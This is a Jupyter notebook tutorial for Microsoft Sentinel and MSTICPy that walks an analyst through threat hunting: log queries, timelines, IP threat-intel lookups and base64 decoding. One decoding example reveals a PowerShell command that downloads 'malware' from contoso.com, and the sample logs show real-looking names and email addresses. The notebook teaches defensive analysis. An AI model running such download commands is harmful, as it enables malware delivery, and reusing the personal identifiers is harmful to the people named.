{ "cells": [ { "cell_type": "markdown", "metadata": {}, "source": [ "# An introduction to Cybersec notebook features\n", "\n", "---\n", "\n", "# Contents\n", "\n", "- Introduction\n", "- Setting up the notebook environment\n", "- Querying data from Microsoft Sentinel\n", "- Visualizing data\n", "- Enriching data\n", "- Analyzing data\n", "- Using Pivot functions\n", "- Appendices\n", "  - Additional resources\n", "  - A brief introduction to pandas DataFrames\n", "\n", "---\n", "\n", "# Introduction\n", "\n", "This notebook takes you through some of the features of Microsoft Sentinel Notebooks and MSTICPy.\n", "\n", "If you are new to notebooks we strongly recommend starting with:\n", "**A Getting Started Guide For Microsoft Sentinel ML notebooks**.\n", "\n", "After you've finished running this notebook, we also recommend:\n", "\n", "- **Configuring your environment** - this covers all of the configuration options for\n", "  accessing external cybersec resources\n", "\n", "Each topic includes 'learn more' sections to provide you with the resources to deep-dive\n", "into each of these topics. We encourage you to work through the notebook from start\n", "to finish.\n", "\n", "
1. Demo data is still downloaded even if you chose Microsoft Sentinel (although it is cached after the first download). The demo data is used as a backup if the queries to the Microsoft Sentinel workspace return no data.
2. If you see a warning "Runtime dependency of PyGObject is missing" when loading the Microsoft Sentinel driver, please see the FAQ section at the end of the A Getting Started Guide For Microsoft Sentinel ML Notebooks notebook.
Using Microsoft Sentinel as primary data source.
\n", "Please copy the code and click on the URL to authenticate\n", " to Microsoft Sentinel if prompted to do so.
\n", "Using local data as primary data source.
\n", "Note:\n", "For local data this will just appear as a list of files.\n", "
" ] }, { "cell_type": "code", "execution_count": 13, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "['AACAudit',\n", " 'AACHttpRequest',\n", " 'AADDomainServicesAccountLogon',\n", " 'AADDomainServicesAccountManagement',\n", " 'AADDomainServicesDirectoryServiceAccess',\n", " 'AADDomainServicesLogonLogoff',\n", " 'AADDomainServicesPolicyChange',\n", " 'AADDomainServicesPrivilegeUse',\n", " 'AADDomainServicesSystemSecurity',\n", " 'AADManagedIdentitySignInLogs']" ] }, "execution_count": 13, "metadata": {}, "output_type": "execute_result" } ], "source": [ "# Get list of tables in our Workspace with the 'schema_tables' property\n", "qry_prov.schema_tables[:10]  # We are outputting only a sample (first 10) tables for brevity\n", "                            # remove the \"[:10]\" to see the whole list\n" ] },
{ "cell_type": "code", "execution_count": 14, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "{\n",
"    \"AADTenantId\": \"string\",\n", "    \"AlternateSignInName\": \"string\",\n", "    \"AppDisplayName\": \"string\",\n", "    \"AppId\": \"string\",\n", "    \"AuthenticationDetails\": \"string\",\n", "    \"AuthenticationMethodsUsed\": \"string\",\n", "    \"AuthenticationProcessingDetails\": \"string\",\n", "    \"AuthenticationRequirement\": \"string\",\n", "    \"AuthenticationRequirementPolicies\": \"string\",\n", "    \"Category\": \"string\",\n", "    \"ClientAppUsed\": \"string\",\n",
"    \"ConditionalAccessPolicies\": \"dynamic\",\n", "    \"ConditionalAccessStatus\": \"string\",\n", "    \"CorrelationId\": \"string\",\n", "    \"CreatedDateTime\": \"datetime\",\n", "    \"DeviceDetail\": \"dynamic\",\n", "    \"DurationMs\": \"long\",\n", "    \"FlaggedForReview\": \"bool\",\n", "    \"HomeTenantId\": \"string\",\n", "    \"IPAddress\": \"string\",\n", "    \"IPAddressFromResourceProvider\": \"string\",\n", "    \"Id\": \"string\",\n", "    \"Identity\": \"string\",\n", "    \"IsInteractive\": \"bool\",\n", "    \"IsRisky\": \"bool\",\n", "    \"Level\": \"string\",\n", "    \"Location\": \"string\",\n", "    \"LocationDetails\": \"dynamic\",\n", "    \"MfaDetail\": \"dynamic\",\n", "    \"NetworkLocationDetails\": \"string\",\n", "    \"OperationName\": \"string\",\n", "    \"OperationVersion\": \"string\",\n", "    \"OriginalRequestId\": \"string\",\n",
"    \"ProcessingTimeInMilliseconds\": \"string\",\n", "    \"Resource\": \"string\",\n", "    \"ResourceDisplayName\": \"string\",\n", "    \"ResourceGroup\": \"string\",\n", "    \"ResourceId\": \"string\",\n", "    \"ResourceIdentity\": \"string\",\n", "    \"ResourceProvider\": \"string\",\n", "    \"ResourceTenantId\": \"string\",\n", "    \"ResultDescription\": \"string\",\n", "    \"ResultSignature\": \"string\",\n", "    \"ResultType\": \"string\",\n", "    \"RiskDetail\": \"string\",\n", "    \"RiskEventTypes\": \"string\",\n", "    \"RiskEventTypes_V2\": \"string\",\n", "    \"RiskLevelAggregated\": \"string\",\n", "    \"RiskLevelDuringSignIn\": \"string\",\n", "    \"RiskState\": \"string\",\n", "    \"ServicePrincipalId\": \"string\",\n", "    \"ServicePrincipalName\": \"string\",\n", "    \"SignInIdentifier\": \"string\",\n", "    \"SignInIdentifierType\": \"string\",\n", "    \"SourceSystem\": \"string\",\n",
"    \"Status\": \"dynamic\",\n", "    \"TimeGenerated\": \"datetime\",\n", "    \"TokenIssuerName\": \"string\",\n", "    \"TokenIssuerType\": \"string\",\n", "    \"Type\": \"string\",\n", "    \"UserAgent\": \"string\",\n", "    \"UserDisplayName\": \"string\",\n", "    \"UserId\": \"string\",\n", "    \"UserPrincipalName\": \"string\",\n", "    \"UserType\": \"string\"\n", "}\n", "\n" ] } ],
"source": [ "# Display the schema for a single table\n", "if qry_prov.environment == \"AzureSentinel\":\n", "    print(qry_prov.schema['SigninLogs'])\n", "else:\n", "    md(\n", "        \"Note: this is the schema of a local pandas DataFrame\"\n", "        \" that emulates the Microsoft Sentinel schema\"\n", "    )\n", "    display(qry_prov.Azure.list_all_signins_geo().dtypes)" ] },
{ "cell_type": "markdown", "metadata": {}, "source": [ "## MSTICPy Query browser\n", "\n", "MSTICPy includes a number of built-in queries.\n", "Most require additional parameters such as the time range and often an\n", "identifying parameter such as the host name, account name or IP address that\n", "you are querying for.\n", "\n", "You can also list the available queries from Python code with:\n", "```\n", "qry_prov.list_queries()\n", "```\n", "Get specific details about a query by calling it with \"?\" as a parameter:\n", "```\n", "qry_prov.Azure.list_all_signins_geo(\"?\")\n", "```" ] },
{ "cell_type": "markdown", "metadata": {}, "source": [ "## Query browser\n", "\n", "The query browser combines 
both of these functions in a scrollable\n", "and filterable list." ] }, { "cell_type": "code", "execution_count": 15, "metadata": {}, "outputs": [ { "data": { "application/vnd.jupyter.widget-view+json": { "model_id": "8d2157a62e404bd5a36ff25f0b4f10d5", "version_major": 2, "version_minor": 0 }, "text/plain": [ "VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle(description_width='initial')), Sel…" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "text/html": [ "Parameters
Query
{table}
| where TimeGenerated >= datetime({start})
| where TimeGenerated <= datetime({end})
| where Computer has "{host_name}"
| take 1
Example
{QueryProvider}[.QueryPath].QueryName(params...)
qry_prov.Azure.get_vmcomputer_for_host(start=start, end=end, hostname=host)
" ], "text/plain": [ "
\n", " | TenantId | \n", "SourceSystem | \n", "TimeGenerated | \n", "ResourceId | \n", "OperationName | \n", "OperationVersion | \n", "Category | \n", "ResultType | \n", "ResultSignature | \n", "ResultDescription | \n", "DurationMs | \n", "CorrelationId | \n", "Resource | \n", "ResourceGroup | \n", "ResourceProvider | \n", "Identity | \n", "Level | \n", "Location | \n", "AlternateSignInName | \n", "AppDisplayName | \n", "AppId | \n", "AuthenticationDetails | \n", "AuthenticationMethodsUsed | \n", "AuthenticationProcessingDetails | \n", "AuthenticationRequirement | \n", "... | \n", "RiskLevelDuringSignIn | \n", "RiskState | \n", "ResourceDisplayName | \n", "ResourceIdentity | \n", "ServicePrincipalId | \n", "ServicePrincipalName | \n", "Status | \n", "TokenIssuerName | \n", "TokenIssuerType | \n", "UserAgent | \n", "UserDisplayName | \n", "UserId | \n", "UserPrincipalName | \n", "AADTenantId | \n", "UserType | \n", "FlaggedForReview | \n", "IPAddressFromResourceProvider | \n", "SignInIdentifier | \n", "SignInIdentifierType | \n", "ResourceTenantId | \n", "HomeTenantId | \n", "Type | \n", "Result | \n", "Latitude | \n", "Longitude | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure AD | \n", "2021-06-28 10:55:21.648000+00:00 | \n", "/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | \n", "Sign-in activity | \n", "1.0 | \n", "SignInLogs | \n", "0 | \n", "None | \n", "\n", " | 0 | \n", "9558f30b-a1db-4676-a586-7db608bdaa69 | \n", "Microsoft.aadiam | \n", "Microsoft.aadiam | \n", "\n", " | On-Premises Directory Synchronization Service Account | \n", "4 | \n", "US | \n", "Sync_AADCON_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "Microsoft Azure Active Directory Connect | \n", "cb1056e2-e479-49de-ae31-7812af012ed8 | \n", "[\\r\\n {\\r\\n \"authenticationStepDateTime\": \"2021-06-28T10:55:21.6485011+00:00\",\\r\\n \"authe... | \n", "\n", " | [\\r\\n {\\r\\n \"key\": \"IsCAEToken\",\\r\\n \"value\": \"False\"\\r\\n }\\r\\n] | \n", "singleFactorAuthentication | \n", "... | \n", "none | \n", "none | \n", "Windows Azure Active Directory | \n", "00000002-0000-0000-c000-000000000000 | \n", "\n", " | \n", " | {'errorCode': 0} | \n", "\n", " | AzureAD | \n", "\n", " | On-Premises Directory Synchronization Service Account | \n", "2235a468-ad9c-4375-8008-0a7be76994a7 | \n", "sync_aadcon_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Member | \n", "None | \n", "\n", " | Sync_AADCON_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "\n", " | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "SigninLogs | \n", "Sucess | \n", "38.73078155517578 | \n", "-78.17196655273438 | \n", "
1 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure AD | \n", "2021-06-28 10:55:26.252000+00:00 | \n", "/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | \n", "Sign-in activity | \n", "1.0 | \n", "SignInLogs | \n", "0 | \n", "None | \n", "\n", " | 0 | \n", "dac1edbe-1985-4f78-8d20-f4725e28b865 | \n", "Microsoft.aadiam | \n", "Microsoft.aadiam | \n", "\n", " | On-Premises Directory Synchronization Service Account | \n", "4 | \n", "US | \n", "Sync_AADCON_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "Microsoft Azure Active Directory Connect | \n", "cb1056e2-e479-49de-ae31-7812af012ed8 | \n", "[\\r\\n {\\r\\n \"authenticationStepDateTime\": \"2021-06-28T10:55:26.2522747+00:00\",\\r\\n \"authe... | \n", "\n", " | [\\r\\n {\\r\\n \"key\": \"IsCAEToken\",\\r\\n \"value\": \"False\"\\r\\n }\\r\\n] | \n", "singleFactorAuthentication | \n", "... | \n", "none | \n", "none | \n", "Windows Azure Active Directory | \n", "00000002-0000-0000-c000-000000000000 | \n", "\n", " | \n", " | {'errorCode': 0} | \n", "\n", " | AzureAD | \n", "\n", " | On-Premises Directory Synchronization Service Account | \n", "2235a468-ad9c-4375-8008-0a7be76994a7 | \n", "sync_aadcon_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Member | \n", "None | \n", "\n", " | Sync_AADCON_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "\n", " | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "SigninLogs | \n", "Sucess | \n", "38.7130012512207 | \n", "-78.15899658203125 | \n", "
2 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure AD | \n", "2021-06-28 11:36:15.896000+00:00 | \n", "/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | \n", "Sign-in activity | \n", "1.0 | \n", "SignInLogs | \n", "0 | \n", "None | \n", "\n", " | 0 | \n", "974ea11a-7ed4-4cfd-b86b-d3d4b5bd547f | \n", "Microsoft.aadiam | \n", "Microsoft.aadiam | \n", "\n", " | Arseny Vasilev | \n", "4 | \n", "RU | \n", "\n", " | Azure Portal | \n", "c44b4083-3bb0-49c1-b47d-974e53cbdf3c | \n", "[\\r\\n {\\r\\n \"authenticationStepDateTime\": \"2021-06-28T11:36:15.8961297+00:00\",\\r\\n \"authe... | \n", "\n", " | [\\r\\n {\\r\\n \"key\": \"IsCAEToken\",\\r\\n \"value\": \"False\"\\r\\n }\\r\\n] | \n", "singleFactorAuthentication | \n", "... | \n", "none | \n", "none | \n", "Windows Azure Service Management API | \n", "797f4846-ba00-4fd7-ba43-dac1f8f63013 | \n", "\n", " | \n", " | {'errorCode': 0} | \n", "\n", " | AzureAD | \n", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.447... | \n", "Arseny Vasilev | \n", "9267d02c-5f76-40a9-a9eb-b686f3ca47aa | \n", "avasilev@viacode.com | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Guest | \n", "None | \n", "\n", " | \n", " | \n", " | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "5fccd68a-e65e-46ae-96b1-2d896d680249 | \n", "SigninLogs | \n", "Sucess | \n", "59.93904113769531 | \n", "30.3157901763916 | \n", "
3 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure AD | \n", "2021-06-28 12:24:50.274000+00:00 | \n", "/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | \n", "Sign-in activity | \n", "1.0 | \n", "SignInLogs | \n", "0 | \n", "None | \n", "\n", " | 0 | \n", "d1c11047-9e6d-4814-80fc-334c453582a3 | \n", "Microsoft.aadiam | \n", "Microsoft.aadiam | \n", "\n", " | Koby Koren | \n", "4 | \n", "IL | \n", "\n", " | Azure Portal | \n", "c44b4083-3bb0-49c1-b47d-974e53cbdf3c | \n", "[\\r\\n {\\r\\n \"authenticationStepDateTime\": \"2021-06-28T12:24:50.2743176+00:00\",\\r\\n \"authe... | \n", "\n", " | [\\r\\n {\\r\\n \"key\": \"Login Hint Present\",\\r\\n \"value\": \"True\"\\r\\n },\\r\\n {\\r\\n \"key\":... | \n", "singleFactorAuthentication | \n", "... | \n", "none | \n", "none | \n", "Windows Azure Service Management API | \n", "797f4846-ba00-4fd7-ba43-dac1f8f63013 | \n", "\n", " | \n", " | {'errorCode': 0} | \n", "\n", " | AzureAD | \n", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.447... | \n", "Koby Koren | \n", "da48f21e-2f91-4c6a-9d30-56fd10a24672 | \n", "kobyk@microsoft.com | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Guest | \n", "None | \n", "\n", " | \n", " | \n", " | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "72f988bf-86f1-41af-91ab-2d7cd011db47 | \n", "SigninLogs | \n", "Sucess | \n", "32.16241073608399 | \n", "34.84468078613281 | \n", "
4 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure AD | \n", "2021-06-28 12:24:44.957000+00:00 | \n", "/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | \n", "Sign-in activity | \n", "1.0 | \n", "SignInLogs | \n", "0 | \n", "None | \n", "\n", " | 0 | \n", "60855931-eec4-466c-a24e-ba630c087a3e | \n", "Microsoft.aadiam | \n", "Microsoft.aadiam | \n", "\n", " | Koby Koren | \n", "4 | \n", "IL | \n", "\n", " | Azure Portal | \n", "c44b4083-3bb0-49c1-b47d-974e53cbdf3c | \n", "[\\r\\n {\\r\\n \"authenticationStepDateTime\": \"2021-06-28T12:24:44.9579314+00:00\",\\r\\n \"authe... | \n", "\n", " | [\\r\\n {\\r\\n \"key\": \"Login Hint Present\",\\r\\n \"value\": \"True\"\\r\\n },\\r\\n {\\r\\n \"key\":... | \n", "singleFactorAuthentication | \n", "... | \n", "none | \n", "none | \n", "Windows Azure Service Management API | \n", "797f4846-ba00-4fd7-ba43-dac1f8f63013 | \n", "\n", " | \n", " | {'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'} | \n", "\n", " | AzureAD | \n", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.447... | \n", "Koby Koren | \n", "da48f21e-2f91-4c6a-9d30-56fd10a24672 | \n", "kobyk@microsoft.com | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Guest | \n", "None | \n", "\n", " | \n", " | \n", " | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "72f988bf-86f1-41af-91ab-2d7cd011db47 | \n", "SigninLogs | \n", "Sucess | \n", "32.16241073608399 | \n", "34.84468078613281 | \n", "
5 rows 69 columns
\n", "start=datetime.utcnow() - timedelta(20),\n", "
| | AlertName | NumAlerts |
|---|---|---|
| 0 | Suspected brute-force attack (LDAP) | 115 |
| 1 | Users with Greater Than 1 City | 4 |
| 2 | Incident and Automation testing 01 | 543 |
| 3 | Malicious credential theft tool execution detected | 118 |
| 4 | TI map IP entity to AzureActivity (enriched) | 48 |
Note:\n", "exec_query is not supported for local data.\n", "
" ] }, { "cell_type": "code", "execution_count": 19, "metadata": {}, "outputs": [ { "data": { "text/html": [ "\n", " | TenantId | \n", "Application | \n", "UserDomain | \n", "UserAgent | \n", "RecordType | \n", "TimeGenerated | \n", "Operation | \n", "OrganizationId | \n", "OrganizationId_ | \n", "UserType | \n", "UserKey | \n", "OfficeWorkload | \n", "ResultStatus | \n", "ResultReasonType | \n", "OfficeObjectId | \n", "UserId | \n", "UserId_ | \n", "ClientIP | \n", "ClientIP_ | \n", "Scope | \n", "Site_ | \n", "ItemType | \n", "EventSource | \n", "Source_Name | \n", "MachineDomainInfo | \n", "... | \n", "ChannelType | \n", "ChannelName | \n", "ChannelGuid | \n", "ExtraProperties | \n", "AddOnType | \n", "AddonName | \n", "TabType | \n", "Name | \n", "OldValue | \n", "NewValue | \n", "ItemName | \n", "ChatThreadId | \n", "ChatName | \n", "CommunicationType | \n", "AADGroupId | \n", "AddOnGuid | \n", "AppDistributionMode | \n", "TargetUserId | \n", "OperationScope | \n", "AzureADAppId | \n", "OperationProperties | \n", "AppId | \n", "ClientAppId | \n", "Type | \n", "_ResourceId | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "\n", " | \n", " | \n", " | 50 | \n", "2021-06-28 12:29:44+00:00 | \n", "MailItemsAccessed | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Regular | \n", "100320003F8A6FC7 | \n", "Exchange | \n", "Succeeded | \n", "Succeeded | \n", "\n", " | MeganB@seccxp.ninja | \n", "MeganB@seccxp.ninja | \n", "\n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | ... | \n", "\n", " | \n", " | \n", " | None | \n", "\n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | [{'Name': 'MailAccessType', 'Value': 'Bind'}, {'Name': 'IsThrottled', 'Value': 'False'}] | \n", "414a677a-e50f-46ea-b89c-aebb8a9efbe2 | \n", "\n", " | OfficeActivity | \n", "\n", " |
1 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "\n", " | \n", " | \n", " | 50 | \n", "2021-06-28 12:29:44+00:00 | \n", "MailItemsAccessed | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Regular | \n", "100320003F8A6FC7 | \n", "Exchange | \n", "Succeeded | \n", "Succeeded | \n", "\n", " | MeganB@seccxp.ninja | \n", "MeganB@seccxp.ninja | \n", "\n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | ... | \n", "\n", " | \n", " | \n", " | None | \n", "\n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | [{'Name': 'MailAccessType', 'Value': 'Bind'}, {'Name': 'IsThrottled', 'Value': 'False'}] | \n", "414a677a-e50f-46ea-b89c-aebb8a9efbe2 | \n", "\n", " | OfficeActivity | \n", "\n", " |
2 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "\n", " | \n", " | \n", " | ExchangeAdmin | \n", "2021-06-28 12:29:33+00:00 | \n", "Set-User | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "DcAdmin | \n", "NT AUTHORITY\\SYSTEM (Microsoft.Exchange.Management.ForwardSync) | \n", "Exchange | \n", "True | \n", "True | \n", "NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com... | \n", "NT AUTHORITY\\SYSTEM (Microsoft.Exchange.Management.ForwardSync) | \n", "NT AUTHORITY\\SYSTEM (Microsoft.Exchange.Management.ForwardSync) | \n", "\n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | ... | \n", "\n", " | \n", " | \n", " | None | \n", "\n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | None | \n", "\n", " | \n", " | OfficeActivity | \n", "\n", " |
3 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "\n", " | \n", " | \n", " | ExchangeAdmin | \n", "2021-06-28 12:38:05+00:00 | \n", "Set-User | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "DcAdmin | \n", "NT AUTHORITY\\SYSTEM (Microsoft.Exchange.Management.ForwardSync) | \n", "Exchange | \n", "True | \n", "True | \n", "NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com... | \n", "NT AUTHORITY\\SYSTEM (Microsoft.Exchange.Management.ForwardSync) | \n", "NT AUTHORITY\\SYSTEM (Microsoft.Exchange.Management.ForwardSync) | \n", "\n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | ... | \n", "\n", " | \n", " | \n", " | None | \n", "\n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | None | \n", "\n", " | \n", " | OfficeActivity | \n", "\n", " |
4 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "\n", " | \n", " | \n", " | 50 | \n", "2021-06-28 14:46:35+00:00 | \n", "MailItemsAccessed | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Regular | \n", "100320003F8A6FC7 | \n", "Exchange | \n", "Succeeded | \n", "Succeeded | \n", "\n", " | MeganB@seccxp.ninja | \n", "MeganB@seccxp.ninja | \n", "\n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | ... | \n", "\n", " | \n", " | \n", " | None | \n", "\n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | [{'Name': 'MailAccessType', 'Value': 'Bind'}, {'Name': 'IsThrottled', 'Value': 'False'}] | \n", "414a677a-e50f-46ea-b89c-aebb8a9efbe2 | \n", "\n", " | OfficeActivity | \n", "\n", " |
5 rows 131 columns
\n", "df.mp_timeline.plot(time_column=\"EventStartTimeUTC\", ...)\n", "2. If there are a lot of logons in your query result the timeline may appear
from msticpy.nbtools.timeline import display_timeline, display_timeline_values\n", "from msticpy.nbtools.timeline_duration import display_timeline_duration\n", "\n", "display_timeline(data, ...[other params])\n", "\n", "display_timeline - shows events as discrete diamonds
\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"
\\n\"+\n \"IP Address to lookup is 40.76.220.11
" ], "text/plain": [
| | Ioc | IocType | QuerySubtype | Provider | Result | Severity | Details | RawResult | Reference | Status |
|---|---|---|---|---|---|---|---|---|---|---|
| OTX | 40.76.220.11 | ipv4 | None | OTX | True | information | {'pulse_count': 0, 'sections_available': ['general', 'geo', 'reputation', 'url_list', 'passive_d... | {'whois': 'http://whois.domaintools.com/40.76.220.11', 'reputation': 0, 'indicator': '40.76.220.... | https://otx.alienvault.com/api/v1/indicators/IPv4/40.76.220.11/general | 0 |
| OPR | 40.76.220.11 | ipv4 | None | OPR | False | information | IoC type ipv4 not supported. | None | None | 1 |
| Tor | 40.76.220.11 | ipv4 | None | Tor | True | information | Not found. | None | https://check.torproject.org/exit-addresses | 0 |
| VirusTotal | 40.76.220.11 | ipv4 | None | VirusTotal | True | information | {'verbose_msg': 'Missing IP address', 'response_code': 0, 'positives': 0} | {'response_code': 0, 'verbose_msg': 'Missing IP address'} | https://www.virustotal.com/vtapi/v2/ip-address/report | 0 |
| XForce | 40.76.220.11 | ipv4 | None | XForce | True | information | {'score': 1, 'cats': {}, 'categoryDescriptions': {}, 'reason': 'Regional Internet Registry', 're... | {'ip': '40.76.220.11', 'history': [{'created': '2012-03-22T07:26:00.000Z', 'reason': 'Regional I... | https://api.xforce.ibmcloud.com/ipr/40.76.220.11 | 0 |
| OTX | |
|---|---|
| pulse_count | 0 |
| sections_available | ['general', 'geo', 'reputation', 'url_list', 'passive_dns', 'malware', 'nids_list', 'http_scans'] |
{'accuracy_radius': 1000,\n", "
'area_code': 0,
'asn': 'AS8075 MICROSOFT-CORP-MSN-AS-BLOCK',
'base_indicator': {},
'charset': 0,
'city': 'Washington',
'city_data': True,
'continent_code': 'NA',
'country_code': 'US',
'country_code2': 'US',
'country_code3': 'USA',
'country_name': 'United States of America',
'dma_code': 511,
'false_positive': [],
'flag_title': 'United States of America',
'flag_url': '/assets/images/flags/us.png',
'indicator': '40.76.220.11',
'latitude': 38.7095,
'longitude': -78.1539,
'postal_code': '22747',
'pulse_info': {'count': 0,
'pulses': [],
'references': [],
'related': {'alienvault': {'adversary': [],
'industries': [],
'malware_families': []},
'other': {'adversary': [],
'industries': [],
'malware_families': []}}},
'region': 'VA',
'reputation': 0,
'sections': ['general',
'geo',
'reputation',
'url_list',
'passive_dns',
'malware',
'nids_list',
'http_scans'],
'subdivision': 'VA',
'type': 'IPv4',
'type_title': 'IPv4',
'validation': [{'message': 'In cloud provider range: provider=azure',
'name': 'Cloud Provider IP range',
'source': 'cloud'}],
'whois': 'http://whois.domaintools.com/40.76.220.11'}
None\n", "
| VirusTotal | |
|---|---|
| verbose_msg | Missing IP address |
| response_code | 0 |
| positives | 0 |
{'response_code': 0, 'verbose_msg': 'Missing IP address'}\n", "
| XForce | |
|---|---|
| score | 1 |
| cats | |
| categoryDescriptions | |
| reason | Regional Internet Registry |
| reasonDescription | One of the five RIRs announced a (new) location mapping of the IP. |
| tags | [] |
| | 0 |
|---|---|
| reference | (, 1., 1) |
| original_string | SW52b2tlLVdlYlJlcXVlc3QgaHR0cHM6Ly9jb250b3NvLmNvbS9tYWx3YXJlIC1PdXRGaWxlIEM6XG1hbHdhcmUuZXhl |
| file_name | unknown |
| file_type | None |
| input_bytes | b'Invoke-WebRequest https://contoso.com/malware -OutFile C:\\malware.exe' |
| decoded_string | Invoke-WebRequest https://contoso.com/malware -OutFile C:\malware.exe |
| encoding_type | utf-8 |
| file_hashes | {'md5': '5845a06d7f52b1818a088e889df95c77', 'sha1': '1c31052c4aabb853777c1ce74943cafe27bb1d42', ... |
| md5 | 5845a06d7f52b1818a088e889df95c77 |
| sha1 | 1c31052c4aabb853777c1ce74943cafe27bb1d42 |
| sha256 | 7054dcebb2f74492c06f4ba89cac8e7e99b44e1a6029e0ad403aab9bb7503d8c |
| printable_bytes | 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 68 74 74 70 73 3a 2f 2f 63 6f 6e 74 6f 73 ... |
| | qname | rdtype | rdclass | response | nameserver | port | canonical_name | rrset | expiration | url_domain | src_row_index |
|---|---|---|---|---|---|---|---|---|---|---|---|
| 0 | www.microsoft.com. | 1 | 1 | id 32410\nopcode QUERY\nrcode NOERROR\nflags QR RD RA\n;QUESTION\nwww.microsoft.com. IN A\n;ANSW... | None | None | e13678.dscb.akamaiedge.net. | [23.218.110.52] | 2021-06-28 21:58:32.828779 | www.microsoft.com | 0 |
| | subdomain | domain | suffix | src_row_index |
|---|---|---|---|---|
| 0 | www | www.microsoft.com | com | 0 |
| | ip | result | src_row_index |
|---|---|---|---|
| 0 | 24.16.133.227 | Public | 0 |
